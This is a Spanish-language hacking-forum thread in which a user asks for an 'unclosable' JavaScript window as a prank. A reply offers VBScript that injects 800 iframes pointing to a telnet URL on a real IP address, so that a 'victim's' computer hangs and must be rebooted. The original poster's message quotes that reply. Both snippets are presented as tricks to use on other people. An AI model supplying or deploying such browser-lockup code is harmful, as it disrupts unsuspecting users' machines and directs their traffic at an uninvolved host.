elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: ¿Eres nuevo? ¿Tienes dudas acerca del funcionamiento de la comunidad? Lee las Reglas Generales


+  Foro de elhacker.net
|-+  Programación
| |-+  Desarrollo Web (Moderador: #!drvy)
| | |-+  javascript Unclosable Window
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: javascript Unclosable Window  (Leído 2,344 veces)
A2Corp


Desconectado Desconectado

Mensajes: 304



Ver Perfil
javascript Unclosable Window
« en: 20 Abril 2012, 20:57 pm »

Buenas Foreros!
Ando de bromista y busco un codigo para una ventana "incerrable", el script funciona bien en firefox pero con chrome no anda :(
casi seguro que es por el window.open, existe alguna alternativa a esta funcion para volver a abrir una ventana?
Código:
<HTML>
<head>
<script>
function closeIt()
{
window.open(self.location);
}
window.onbeforeunload = closeIt;
</script>
</head>
<body>
</body>
</html>

Saludos!


En línea

Hackeo, luego existo...
Carluís

Desconectado Desconectado

Mensajes: 49


Estableciendo conexión...


Ver Perfil WWW
Re: javascript Unclosable Window
« Respuesta #1 en: 21 Abril 2012, 19:08 pm »

Buen dia amigo, esos trucos que pueden ser realizados con javascript ya son antiguos y tienen la capacidad de cerrarse con el Administrador de Tareas, no hace mucho descubrí un método para burlar cualquier método de cerrado y que cuelga el computador instantáneamente.

Se trata de generar ventanas DOS utilizando VBScript, lo que esto hace es generar muchas ventanas DOS que dejará el computador inutilizable y la única opción de la victima será reiniciar el equipo.

Podemos utilizar algo como lo siguiente:

Código:
<script type="text/vbscript">  
for a=1 to 800  
document.write("<iframe src=" + chr(34) + "telnet://68.178.254.21:21" + chr(34) + ">")  
next  
</script>

Bueno sin más que decir, te dejo el link de mi artículo para que implementes el script completo: Jugando con ventanas DOS desde un sitio web y contigo.

Saludos.


En línea

Desarrollo Web, Blogging, Diseño: http://onsoni.blogspot.com
A2Corp


Desconectado Desconectado

Mensajes: 304



Ver Perfil
Re: javascript Unclosable Window
« Respuesta #2 en: 23 Abril 2012, 07:17 am »

Buen dia amigo, esos trucos que pueden ser realizados con javascript ya son antiguos y tienen la capacidad de cerrarse con el Administrador de Tareas, no hace mucho descubrí un método para burlar cualquier método de cerrado y que cuelga el computador instantáneamente.

Se trata de generar ventanas DOS utilizando VBScript, lo que esto hace es generar muchas ventanas DOS que dejará el computador inutilizable y la única opción de la victima será reiniciar el equipo.

Podemos utilizar algo como lo siguiente:

Código:
<script type="text/vbscript">  
for a=1 to 800  
document.write("<iframe src=" + chr(34) + "telnet://68.178.254.21:21" + chr(34) + ">")  
next  
</script>


interesante, gracias brother.
Viendo lo de mi codigo, me doy cuenta que la parte que falla es en el window.open, chrome y firefox lo toman como popup y no reabren la ventana.

Bueno sin más que decir, te dejo el link de mi artículo para que implementes el script completo: Jugando con ventanas DOS desde un sitio web y contigo.

Saludos.
En línea

Hackeo, luego existo...
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
grabar un window$
Software
cuervo 3 1,781 Último mensaje 12 Noviembre 2004, 07:53 am
por cuervo
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines